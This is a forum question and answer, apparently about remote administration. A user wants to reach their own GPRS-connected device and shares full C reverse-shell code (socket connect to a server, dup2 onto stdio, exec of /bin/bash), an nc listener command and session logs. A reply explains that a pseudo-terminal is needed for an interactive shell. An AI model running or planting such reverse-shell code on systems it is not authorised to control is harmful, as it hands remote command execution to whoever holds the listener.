I need to setup a reverse shell in order to connect to a device that is connected to the internet through a GPRS modem.
When special conditions occours, i start this command on a public server with fixed ip
nc -l 65535
then i'll make this code run (now i'm directly connected to the device through a cable for test purposes) (and yes, the fork is useless in this case but i'll need it in my final scenario, so i kept it)
#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
int reverse_shell()
{
pid_t p = 0;
/* fork */
p = fork();
if (p == 0)
{
char *shell[2];
int i,fd;
struct sockaddr_in sin;
/* open socket */
fd = socket(AF_INET, SOCK_STREAM, 0);
sin.sin_family = AF_INET;
sin.sin_addr.s_addr = inet_addr("MY SERVER PUBLIC IP ADDRESS");
sin.sin_port = htons(65535);
/* connect! */
connect(fd, (struct sockaddr *)&sin,sizeof(struct sockaddr_in));
/* assign three first fd (input/output/err) to open socket */
for(i=0; i<3; i++)
dup2(fd, i);
/* build array */
shell[0] = "/bin/bash";
shell[1] = 0;
/* start the reverse shell */
if (execve(shell[0], shell, NULL) == -1)
printf("error\n");
exit(0);
}
return 0;
}
int main()
{
reverse_shell();
}
The reverse shell is setup but, as you can see, i got no prompt and it's looking a bit confusing.
[root@public-server tmp]# nc -lv 65535
Connection from yyy.yyy.yyy.yyy port 65535 [tcp/*] accepted
cd /etc
ls *hosts*
hosts
hosts.allow
hosts.deny
Plus, i need to use scp but messages keep on appearing on device prompt and not on reverse-connected server
reverse-connected server:
[root@public-server tmp]# nc -lv 65535
Connection from yyy.yyy.yyy.yyy port 65535 [tcp/*] accepted
ls /etc/hosts
/etc/hosts
scp /etc/hosts xxx.xxx.xxx.xxx:/tmp/
Host key verification failed.
lost connection
device prompt:
root@device:/tmp# ./a.out
root@device:/tmp# The authenticity of host 'xxx.xxx.xxx.xxx (xxx.xxx.xxx.xxx)' can't be established.
RSA key fingerprint is aa:e6:aa:1d:aa:a5:c2:fd:aa:4c:4f:e7:aa:34:aa:78.
Are you sure you want to continue connecting (yes/no)?
What can i do to fix this and obtain a stable and usable reverse shell?
The problem is that your shell only gets a plain file descriptor. With that, it can only operate like executing a script. To operate interactively, it needs a terminal allowing it to do all the termios stuff. This is what pseudo-terminals (pty) are for. A quick google search brought up this guide, I didn't read it entirely, maybe there are better sources -- good luck.
PS: I have no experience with ptys, so this could be wrong, but I assume you should somehow set the TERM environment variable on the client side to that of the server before starting the shell, so it would be advisable to implement your own server (instead of nc) and have a little initialization protocol bevore starting the shell.
Collected from the Internet
Please contact [email protected] to delete if infringement.
Comments